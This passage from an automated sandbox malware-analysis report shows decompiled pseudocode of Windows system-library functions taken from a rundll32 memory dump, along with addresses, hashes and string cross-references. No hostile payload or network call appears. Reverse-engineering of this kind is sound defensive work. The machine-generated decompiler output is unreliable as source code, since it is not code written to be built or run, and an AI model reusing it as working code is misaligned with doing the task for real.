					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                0x0442f71d
                                                                                                                0x0442f722
                                                                                                                0x0442f726
                                                                                                                0x04474770
                                                                                                                0x0442f765
                                                                                                                0x0442f769
                                                                                                                0x0442f769
                                                                                                                0x0442f732
                                                                                                                0x0447477a
                                                                                                                0x00000000
                                                                                                                0x0447477a
                                                                                                                0x0442f738
                                                                                                                0x0442f73a
                                                                                                                0x0442f73c
                                                                                                                0x0442f73f
                                                                                                                0x0442f746
                                                                                                                0x0442f778
                                                                                                                0x0442f7a9
                                                                                                                0x0442f7a9
                                                                                                                0x0442f754
                                                                                                                0x0442f75a
                                                                                                                0x0442f75d
                                                                                                                0x0442f75f
                                                                                                                0x0442f761
                                                                                                                0x0442f76f
                                                                                                                0x0442f771
                                                                                                                0x0442f771
                                                                                                                0x0442f76f
                                                                                                                0x0442f763
                                                                                                                0x00000000
                                                                                                                0x0442f763
                                                                                                                0x0442f77d
                                                                                                                0x0442f7a3
                                                                                                                0x0442f7a5
                                                                                                                0x00000000
                                                                                                                0x0442f7a5
                                                                                                                0x0442f77f
                                                                                                                0x0442f782
                                                                                                                0x0442f784
                                                                                                                0x0442f786
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442f788
                                                                                                                0x0442f748
                                                                                                                0x0442f74d
                                                                                                                0x0442f78d
                                                                                                                0x0442f793
                                                                                                                0x0442f7b7
                                                                                                                0x0442f7bc
                                                                                                                0x00000000
                                                                                                                0x0442f7bc
                                                                                                                0x0442f798
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442f79d
                                                                                                                0x0442f7b0
                                                                                                                0x00000000
                                                                                                                0x0442f7b0
                                                                                                                0x0442f79f
                                                                                                                0x00000000
                                                                                                                0x0442f74f
                                                                                                                0x0442f74f
                                                                                                                0x00000000
                                                                                                                0x0442f74f

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Actx
                                                                                                                • API String ID: 0-89312691
                                                                                                                • Opcode ID: 0a4c6b78eff2ea8af090409ff3d92593bbbb1cc06db6a42b04532c38f3bcfed0
                                                                                                                • Instruction ID: f9ca5774907e0bdd82118a0a18bf99e6315cb302569736240609b5795a7fa088
                                                                                                                • Opcode Fuzzy Hash: 0a4c6b78eff2ea8af090409ff3d92593bbbb1cc06db6a42b04532c38f3bcfed0
                                                                                                                • Instruction Fuzzy Hash: 0F117F393046228BEF344E19879077772B5ABC5764FE4453BE861CB391E670F84AB340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044B8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E044B8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x44e0d50);
				E0445D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04495720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0445DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0445DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0445D130(_t34, _t39, _t40);
			}





                                                                                                                0x044b8df1
                                                                                                                0x044b8df1
                                                                                                                0x044b8df1
                                                                                                                0x044b8df1
                                                                                                                0x044b8df1
                                                                                                                0x044b8df1
                                                                                                                0x044b8df3
                                                                                                                0x044b8df8
                                                                                                                0x044b8dfd
                                                                                                                0x044b8e00
                                                                                                                0x044b8e0e
                                                                                                                0x044b8e2a
                                                                                                                0x044b8e36
                                                                                                                0x044b8e38
                                                                                                                0x044b8e3c
                                                                                                                0x044b8e46
                                                                                                                0x044b8e46
                                                                                                                0x044b8e36
                                                                                                                0x044b8e50
                                                                                                                0x044b8e56
                                                                                                                0x044b8e59
                                                                                                                0x044b8e5c
                                                                                                                0x044b8e60
                                                                                                                0x044b8e67
                                                                                                                0x044b8e6d
                                                                                                                0x044b8e73
                                                                                                                0x044b8e74
                                                                                                                0x044b8eb1
                                                                                                                0x044b8ebd

                                                                                                                Strings
                                                                                                                • Critical error detected %lx, xrefs: 044B8E21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Critical error detected %lx
                                                                                                                • API String ID: 0-802127002
                                                                                                                • Opcode ID: 3c3c52744564431ac9ea6874ccfa3b063badd3f643411c49e5fd354884d4235c
                                                                                                                • Instruction ID: b3dcc0a5cedb19d6918d2a1e5a73f25f0490871a1605ebb0171e13216be17466
                                                                                                                • Opcode Fuzzy Hash: 3c3c52744564431ac9ea6874ccfa3b063badd3f643411c49e5fd354884d4235c
                                                                                                                • Instruction Fuzzy Hash: 211179B1D00348DBEF25DFA989057DDBBB4AB04314F24825ED569AB392C3346602CF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0449FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0449FF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                • API String ID: 0-1911121157
                                                                                                                • Opcode ID: 27713b6ae5ffcafb23c3d9bf2f005309b5c8fabbc6f84f2399f3cdb92837692b
                                                                                                                • Instruction ID: d2e667d3529b36d4ebb9cf41ceeda2dffe916baa2ec3628cfa0129522fbe1492
                                                                                                                • Opcode Fuzzy Hash: 27713b6ae5ffcafb23c3d9bf2f005309b5c8fabbc6f84f2399f3cdb92837692b
                                                                                                                • Instruction Fuzzy Hash: 6C118E71910144EFEF12DF50C948F997BB1FF08709F24805AE508972A2C739BD54DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D5BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E044D5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x44e1178);
				E0445D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E044D4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0444D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E044D5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x44f60e8;
								if( *0x44f60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x44f60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04449710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04446DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0444F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0444F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0444F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0444FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0444FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0444F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0444F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E044D4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0445D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                0x044d5ba5
                                                                                                                0x044d5baa
                                                                                                                0x044d5baf
                                                                                                                0x044d5bb4
                                                                                                                0x044d5bb6
                                                                                                                0x044d5bbc
                                                                                                                0x044d5bbe
                                                                                                                0x044d5bc4
                                                                                                                0x044d5bcd
                                                                                                                0x044d5bd3
                                                                                                                0x044d5bd6
                                                                                                                0x044d5bdc
                                                                                                                0x044d5be0
                                                                                                                0x044d5be3
                                                                                                                0x044d5beb
                                                                                                                0x044d5bf2
                                                                                                                0x044d5bf8
                                                                                                                0x044d5bfe
                                                                                                                0x044d5c04
                                                                                                                0x044d5c0e
                                                                                                                0x044d5c18
                                                                                                                0x044d5c1f
                                                                                                                0x044d5c25
                                                                                                                0x044d5c2a
                                                                                                                0x044d5c2c
                                                                                                                0x044d5c32
                                                                                                                0x044d5c3a
                                                                                                                0x044d5c3f
                                                                                                                0x044d5c42
                                                                                                                0x044d5c48
